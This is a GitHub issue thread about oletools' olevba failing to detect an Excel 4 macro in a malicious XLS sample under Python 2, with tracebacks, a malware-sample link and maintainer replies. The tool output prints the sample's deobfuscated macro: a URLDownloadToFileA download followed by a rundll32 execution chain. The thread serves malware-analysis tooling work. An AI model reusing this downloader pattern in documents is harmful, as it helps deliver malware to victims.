
OLEVBA do not show xls macro while OLEID indicate it exist

Open randubin opened this issue 2 years ago • 5 comments

Affected tool: olevba version 0.6 (latest)

Describe the bug
OLEVBA fails to show and detect the macro inside the XLS file, while OleId does indicate it.

FILE: 062d8e8c3de4faeb07f686514dbb8f9d.xls
Type: OLE
ERROR    Error when running XLMMacroDeobfuscator
ERROR    Error when running oledump.plugin_biff, please report to https://github.com/decalage2/oletools/issues
Traceback (most recent call last):
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/olevba.py", line 3453, in _extract_xlm_plugin_biff
    self.xlm_macros = biff_plugin.Analyze()
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 5320, in Analyze
    parsedExpression, stack = ParseExpression(expression, definesNames, sheetNames, options.cellrefformat)
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 1263, in ParseExpression
    cellref, expression = ParseLoc(expression, cellrefformat, True)
  File "/opt/anaconda3/lib/python3.8/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 212, in ParseLoc
    row, column = struct.unpack(formatcodes, expression[0:formatsize])
struct.error: unpack requires a buffer of 4 bytes
**No VBA or XLM macros found.**

File/Malware sample to reproduce the bug
Link: https://bazaar.abuse.ch/sample/2eb56d46618b75f2cd45197602d9c8e8c2fe63fd61fe25780d11f5e13a45959f/
sha256: 2eb56d46618b75f2cd45197602d9c8e8c2fe63fd61fe25780d11f5e13a45959f

OleId: [screenshot]

How To Reproduce the bug
Regular run of oleid and olevba.

Expected behavior
olevba: macro detected.


Version information:

  • OS: Mac
  • OS version: x.xx - 32/64 bits
  • Python version: 3.8.8 - 64 bits
  • oletools version: 0.6

Additional context: no need.

randubin avatar Feb 16 '22 08:02 randubin

I can see this problem was solved in version oletools-0.60.1.dev6. Sorry.

randubin avatar Feb 16 '22 09:02 randubin

Sorry, for Python 3.8.8 it works with the latest version. For Python 2.7.18 with the latest oletools (0.60.1.dev6), OleId and olevba do not detect the macro. Python 2.7.18:

Type: OLE
ERROR    Error when running oledump.plugin_biff, please report to https://github.com/decalage2/oletools/issues
Traceback (most recent call last):
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/olevba.py", line 3454, in _extract_xlm_plugin_biff
    self.xlm_macros = biff_plugin.Analyze()
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 5320, in Analyze
    parsedExpression, stack = ParseExpression(expression, definesNames, sheetNames, options.cellrefformat)
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 1263, in ParseExpression
    cellref, expression = ParseLoc(expression, cellrefformat, True)
  File "/opt/anaconda3/envs/python2/lib/python2.7/site-packages/oletools/thirdparty/oledump/plugin_biff.py", line 212, in ParseLoc
    row, column = struct.unpack(formatcodes, expression[0:formatsize])
error: unpack requires a string argument of length 4
No VBA or XLM macros found.

Python 3.8.8:

Type: OLE
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt 
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: DocuSign., Macrosheet
' CELL:E178, =EXEC((('Bob'!L39&" ")&'Bob'!J39)&'Bob'!L41), 0
' CELL:D181, =Kopaters(0.0,('Bob'!J43&C191)&C185,'Bob'!J39&"2",0.0,0.0), 29
' CELL:D183, =Kopaters(0.0,('Bob'!J43&C193)&C185,'Bob'!J39&"4",0.0,0.0), 29
' CELL:E182, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"4")&'Bob'!L41), 0
' CELL:E180, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"2")&'Bob'!L41), 0
' CELL:D185, =Kopaters(0.0,('Bob'!J43&C195)&C185,'Bob'!J39&"6",0.0,0.0), 29
' CELL:E184, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"6")&'Bob'!L41), 0
' CELL:D178, =REGISTER((((('Bob'!H39&'Bob'!H40)&'Bob'!H41)&'Bob'!H42)&'Bob'!H43)&'Bob'!H44,(((((((((('Bob'!I39&'Bob'!I40)&'Bob'!I41)&'Bob'!I42)&'Bob'!I43)&'Bob'!I44)&'Bob'!I45)&'Bob'!I46)&'Bob'!I47)&'Bob'!I48)&'Bob'!I49)&"ToFileA","JJCCBB","Kopaters",,1.0,9.0), 0
' CELL:E186, =HALT(), 0
' CELL:D182, =Kopaters(0.0,('Bob'!J43&C192)&C185,'Bob'!J39&"3",0.0,0.0), 29
' CELL:D180, =Kopaters(0.0,('Bob'!J43&C190)&C185,'Bob'!J39&"1",0.0,0.0), 29
' CELL:A180, =GOTO(D178), 0
' CELL:E179, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"1")&'Bob'!L41), 0
' CELL:D184, =Kopaters(0.0,('Bob'!J43&C194)&C185,'Bob'!J39&"5",0.0,0.0), 29
' CELL:C185, =<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&".jpg", 3118268.jpg
' CELL:E181, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"3")&'Bob'!L41), 0
' CELL:E183, =EXEC(((('Bob'!L39&" ")&'Bob'!J39)&"5")&'Bob'!L41), 0
' CELL:D188, =GOTO(E178), 42
' CELL:D179, =D184, 0.0
...
..
' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' EMULATION - DEOBFUSCATED EXCEL4/XLM MACRO FORMULAS:
' CELL:A180      , FullEvaluation      , GOTO(D178)
' CELL:D178      , FullEvaluation      , =REGISTER("URLMon","URLDownloadToFileA","JJCCBB","Kopaters",1,9)
' CELL:D179      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss5",0,0)
' CELL:D180      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss1",0,0)
' CELL:D181      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"=<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss2",0,0)
' CELL:D182      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss3",0,0)
' CELL:D183      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"=<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss4",0,0)
' CELL:D184      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss5",0,0)
' CELL:D185      , PartialEvaluation   , =URLMon.URLDownloadToFileA(0,"<<Name #0 in external(?) file #2>>(1254532.0,8562149.0)&"".jpg""","..\GGrioda.deriiiss6",0,0)
' CELL:D188      , FullEvaluation      , GOTO(E178)
' CELL:E178      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss,DllRegisterServer")
' CELL:E179      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss1,DllRegisterServer")
' CELL:E180      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss2,DllRegisterServer")
' CELL:E181      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss3,DllRegisterServer")
' CELL:E182      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss4,DllRegisterServer")
' CELL:E183      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss5,DllRegisterServer")
' CELL:E184      , PartialEvaluation   , =EXEC("rundll32 ..\GGrioda.deriiiss6,DllRegisterServer")
' CELL:E186      , End                 , HALT()
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|URLDownloadToFileA  |May download files from the Internet         |
|Suspicious|EXEC                |May run an executable file or a system       |
|          |                    |command using Excel 4 Macros (XLM/XLF)       |
|Suspicious|REGISTER            |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
...
...
...
|Suspicious|XLM macro           |XLM macro found. It may contain malicious    |
|          |                    |code                                         |
+----------+----------------

randubin avatar Feb 16 '22 12:02 randubin

I see that on Python 3 you have XLMMacroDeobfuscator installed, so it works well. But on Python 2 it is not installed, so olevba falls back to plugin_biff instead, and it triggers an exception when parsing the macro. If you install XLMMacroDeobfuscator on python 2 it should work: could you please try? You can do it by running pip2 install -U oletools[full]

decalage2 avatar Mar 12 '22 22:03 decalage2
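The fallback chain described in the comment above (XLMMacroDeobfuscator when available, otherwise plugin_biff, whose `struct.unpack` in `ParseLoc` aborts on a short buffer) has a triage consequence worth making concrete: a parser exception in the fallback is reported as "No VBA or XLM macros found", i.e. a false negative. The following is an added example, not oletools code and not decalage2's: `parse_loc`, `biff_fallback_scan`, `tolerant_scan` and `detect_xlm` are hypothetical stand-ins built on constructed record tuples, showing a length check before unpacking, per-record error handling, and a tri-state result so that an analysis error is never reported as "clean".

```python
import struct
from enum import Enum


class XlmResult(Enum):
    """Tri-state outcome: an analysis failure is distinct from 'no macros'."""
    MACROS_FOUND = "macros found"
    NONE_FOUND = "no macros found"
    ANALYSIS_ERROR = "analysis error: needs manual review"


def parse_loc(expression, cellrefformat="<HH"):
    """Hypothetical stand-in for the ParseLoc step in the traceback above:
    unpack (row, column) from the head of a formula token stream.
    Checks the buffer length first so a truncated token raises a clear
    ValueError instead of a bare struct.error."""
    size = struct.calcsize(cellrefformat)
    if len(expression) < size:
        raise ValueError("truncated cell reference: need %d bytes, got %d"
                         % (size, len(expression)))
    row, column = struct.unpack(cellrefformat, expression[:size])
    return (row, column), expression[size:]


def biff_fallback_scan(records):
    """Hypothetical stand-in for the plugin_biff fallback: walk constructed
    (record_type, payload) tuples and parse the cell reference of every
    FORMULA record (type 0x0006). One bad record aborts the whole scan,
    which is the failure mode seen in the issue."""
    found = []
    for rec_type, payload in records:
        if rec_type == 0x0006:
            (row, col), _rest = parse_loc(payload)
            found.append((row, col))
    return found


def tolerant_scan(records):
    """Hypothetical primary scanner: same walk, but a malformed record is
    skipped and recorded rather than aborting the analysis, so the cells
    that do parse are still reported."""
    found = []
    for rec_type, payload in records:
        if rec_type != 0x0006:
            continue
        try:
            (row, col), _rest = parse_loc(payload)
        except ValueError:
            continue  # skip the bad token, keep scanning
        found.append((row, col))
    return found


def detect_xlm(records, primary_scanner=None):
    """Mirror the fallback chain: use the primary scanner if installed,
    otherwise the BIFF fallback. Any exception becomes ANALYSIS_ERROR
    rather than being collapsed into NONE_FOUND."""
    scanner = primary_scanner if primary_scanner is not None else biff_fallback_scan
    try:
        cells = scanner(records)
    except Exception as exc:  # parser bug or malformed sample
        return XlmResult.ANALYSIS_ERROR, str(exc)
    return (XlmResult.MACROS_FOUND if cells else XlmResult.NONE_FOUND), cells


# Constructed sample records (not taken from the real file): well-formed
# FORMULA records, and one whose token is truncated to 3 bytes, the shape
# that produces "unpack requires a buffer of 4 bytes".
GOOD_RECORDS = [
    (0x0006, struct.pack("<HH", 177, 4) + b"\x00"),
    (0x0006, struct.pack("<HH", 179, 3)),
]
TRUNCATED_RECORDS = [
    (0x0006, struct.pack("<HH", 177, 4)),
    (0x0006, b"\x01\x02\x03"),
]

if __name__ == "__main__":
    # Fallback only (the Python 2 situation in the issue) vs. primary scanner.
    print("fallback, good sample:     ", detect_xlm(GOOD_RECORDS))
    print("fallback, truncated sample:", detect_xlm(TRUNCATED_RECORDS))
    print("primary, truncated sample: ",
          detect_xlm(TRUNCATED_RECORDS, primary_scanner=tolerant_scan))
```

In a triage pipeline the `ANALYSIS_ERROR` outcome should route the sample to manual review or a second tool (oleid still flagged the macro here), whereas the original output's final line reads as a clean verdict.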

It seems that XLMMacroDeobfuscator doesn't support python 2, only >3.4. I tried to install it with 'full', but I am getting the following error:

ERROR: Could not find a version that satisfies the requirement complete (from versions: none)
ERROR: No matching distribution found for full

When installing XLMMacroDeobfuscator directly, I am getting:

ERROR: Package 'XLMMacroDeobfuscator' requires a different Python: 2.7.18 not in '>=3.4'

Thanks for the help!

randubin avatar Mar 14 '22 07:03 randubin

OK, good catch. Then I need to adapt the setup script for python 2. And to improve error handling when executing plugin_biff + check why oleid reports macros and not olevba.

decalage2 avatar Mar 14 '22 09:03 decalage2